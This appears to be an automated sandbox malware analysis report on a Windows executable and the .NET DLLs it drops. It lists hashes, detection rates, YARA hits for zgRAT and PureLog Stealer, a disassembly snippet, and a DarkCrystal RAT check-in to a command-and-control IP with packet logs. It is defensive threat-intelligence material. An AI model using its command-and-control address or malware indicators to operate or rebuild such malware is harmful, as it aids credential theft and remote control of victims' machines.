                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):342528
                                                                                            Entropy (8bit):6.170134230759619
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):33280
                                                                                            Entropy (8bit):5.634433516692816
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                            MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                            SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                            SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                            SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):50176
                                                                                            Entropy (8bit):5.723168999026349
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):34304
                                                                                            Entropy (8bit):5.618776214605176
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):16625664
                                                                                            Entropy (8bit):2.032052063403891
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:9ArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIM:9t8hZ+2Muz/EeaLx1S9Rmf
                                                                                            MD5:497FE9F6B69ACEB2358177C4DF4DE1FE
                                                                                            SHA1:F97F54F6F818DD07BEE82A3E2A3D1412F1852B60
                                                                                            SHA-256:E2BBF9A32FE44B74F907748517D4FF3C618D3E13AD667B8886F2F2BE4A59C4FE
                                                                                            SHA-512:82BBB737B5237BD81BFECC713D8F85BAB12C2FFB4486FB572F8F66F1DD5C7D7125D6F4A28616CDC2AE6F8F2398A0D4F51EC6A9F58131A04365F7761E8AAC7D2D
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\ZI0Zcb1pDT.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\ZI0Zcb1pDT.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.g............................n.... ..../...@.. .......................@/...........@................................. ...K...../. .................... /...................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...../.....................@....reloc....... /.....................@..B................P.......H.......................X...).$..........................................0..........(.... ........8........E............*...N...8....*(.... ....~{...{i...9....& ....8....(.... ....~{...{....9....& ....8....(.... ....8........0.......... ........8........E....=...............s.......88...8.... ....8....~....:.... ....~{...{....:....& ....8....~....(N... .... .... ....s....~....(R....... ....8p.......~....(V...~....(Z... ....<.... ....8D...r...ps....z*...... ....~{...{....:....
                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):151
                                                                                            Entropy (8bit):4.86917538506792
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FX+zTRS50fQ6HKNvoRyLRvj:Vx993DEUvT2uVgN
                                                                                            MD5:673589E2B429222178557E8C45591AAF
                                                                                            SHA1:31644319DC7D40A2F2FEAADFB9069489B7978C13
                                                                                            SHA-256:B564D1A6DC881279016C238D41FD700A208CCBEF5B5E349D9EB31B680D79BF7A
                                                                                            SHA-512:F07BEFA3640939B2882DBF625E29BA129DA0E6E3E1F9B7AEB8BB624D3251B1FC0BD9148B5231F513254E003B4B090C444EC411CB09C68773740FF442B86C64E9
                                                                                            Malicious:false
                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 06/03/2025 15:47:36..15:47:36, error: 0x80072746.15:47:41, error: 0x80072746.
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):2.1654172480904434
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:Ccp3sJPDXs.exe
                                                                                            File size:16'971'446 bytes
                                                                                            MD5:3e27b10ac7aa4c46437a300fb3ea5bdf
                                                                                            SHA1:12d7c8cc0062c6a3c7c43a798cc372f4550387d2
                                                                                            SHA256:64d47e7c05d73ded8c5e3e88195f1173477e55527ad064aca606ef80fda9a38d
                                                                                            SHA512:8ed2da16acd43882c617bd653c0dfdf5ca1ac9d551205fa490a0f0ff64963b8e25eb542ef1ed3f51c052151d0b70e8b25981ac2f25e2721b8aa12745f44f2571
                                                                                            SSDEEP:49152:rBvZArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIMr:Vxt8hZ+2Muz/EeaLx1S9Rmf1
                                                                                            TLSH:4C07E10666D5CAF7C26147F281A7143D53A7E63629F1EB0B364F11A5E8037B0CE722A7
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                            Icon Hash:09b649692424da65
                                                                                            Entrypoint:0x41f530
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                            Instruction
                                                                                            call 00007F490D378A3Bh
                                                                                            jmp 00007F490D37834Dh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007F490D36B197h
                                                                                            mov dword ptr [esi], 004356D0h
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 004356D8h
                                                                                            mov dword ptr [ecx], 004356D0h
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            mov esi, ecx
                                                                                            lea eax, dword ptr [esi+04h]
                                                                                            mov dword ptr [esi], 004356B8h
                                                                                            push eax
                                                                                            call 00007F490D37B7DFh
                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                            pop ecx
                                                                                            je 00007F490D3784DCh
                                                                                            push 0000000Ch
                                                                                            push esi
                                                                                            call 00007F490D377A99h
                                                                                            pop ecx
                                                                                            pop ecx
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007F490D36B112h
                                                                                            push 0043BEF0h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007F490D37B299h
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007F490D378458h
                                                                                            push 0043C0F4h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007F490D37B27Ch
                                                                                            int3
                                                                                            jmp 00007F490D37CD17h
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00422900h
                                                                                            push dword ptr fs:[00000000h]
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x13c18.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000x233c.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x640000x13c180x13e00a1d05e6599862fb9ed4eb7530d063f59False0.10381043632075472data3.619684819789998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x780000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_BITMAP0x644ec0xbb6Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/m0.2581721147431621
                                                                                            RT_ICON0x650a40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11339 x 11339 px/m0.0594167751094286
                                                                                            RT_DIALOG0x758cc0x286dataEnglishUnited States0.5092879256965944
                                                                                            RT_DIALOG0x75b540x13adataEnglishUnited States0.60828025477707
                                                                                            RT_DIALOG0x75c900xecdataEnglishUnited States0.6991525423728814
                                                                                            RT_DIALOG0x75d7c0x12edataEnglishUnited States0.5927152317880795
                                                                                            RT_DIALOG0x75eac0x338dataEnglishUnited States0.45145631067961167
                                                                                            RT_DIALOG0x761e40x252dataEnglishUnited States0.5757575757575758
                                                                                            RT_STRING0x764380x1e2dataEnglishUnited States0.3900414937759336
                                                                                            RT_STRING0x7661c0x1ccdataEnglishUnited States0.4282608695652174
                                                                                            RT_STRING0x767e80x1b8dataEnglishUnited States0.45681818181818185
                                                                                            RT_STRING0x769a00x146dataEnglishUnited States0.5153374233128835
                                                                                            RT_STRING0x76ae80x46cdataEnglishUnited States0.3454063604240283
                                                                                            RT_STRING0x76f540x166dataEnglishUnited States0.49162011173184356
                                                                                            RT_STRING0x770bc0x152dataEnglishUnited States0.5059171597633136
                                                                                            RT_STRING0x772100x10adataEnglishUnited States0.49624060150375937
                                                                                            RT_STRING0x7731c0xbcdataEnglishUnited States0.6329787234042553
                                                                                            RT_STRING0x773d80xd6dataEnglishUnited States0.5747663551401869
                                                                                            RT_GROUP_ICON0x774b00x14data1.0
                                                                                            RT_MANIFEST0x774c40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                            DLLImport
                                                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-03-06T20:21:57.694330+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549753188.114.96.380TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 6, 2025 20:21:57.114665985 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:57.119808912 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:57.119910955 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:57.120623112 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:57.125621080 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:57.476661921 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:57.481805086 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:57.617291927 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:57.694329977 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:57.926038980 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:57.926052094 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:57.926181078 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.007807016 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.012916088 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.106709957 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.106992960 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.112037897 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.140511036 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.145595074 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.145749092 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.145806074 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.150841951 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.329355955 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.371836901 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.372595072 CET4976080192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.377074957 CET8049753188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.377155066 CET4975380192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.377613068 CET8049760188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.377790928 CET4976080192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.377790928 CET4976080192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.382858992 CET8049760188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.491190910 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.496217966 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.496234894 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.496243000 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.612632990 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.716321945 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.725646019 CET4976080192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:58.730745077 CET8049760188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.730766058 CET8049760188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.845002890 CET8049760188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:58.848381996 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.002746105 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.003703117 CET4976180192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.007991076 CET8049759188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.008215904 CET4975980192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.008766890 CET8049761188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.008842945 CET4976180192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.009025097 CET4976180192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.014004946 CET8049761188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.019150019 CET4976080192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.099159956 CET8049760188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.163290977 CET4976080192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.366180897 CET4976180192.168.2.5188.114.96.3
                                                                                            Mar 6, 2025 20:21:59.371387005 CET8049761188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.371402979 CET8049761188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.371413946 CET8049761188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.480118036 CET8049761188.114.96.3192.168.2.5
                                                                                            Mar 6, 2025 20:21:59.694304943 CET4976180192.168.2.5188.114.96.3
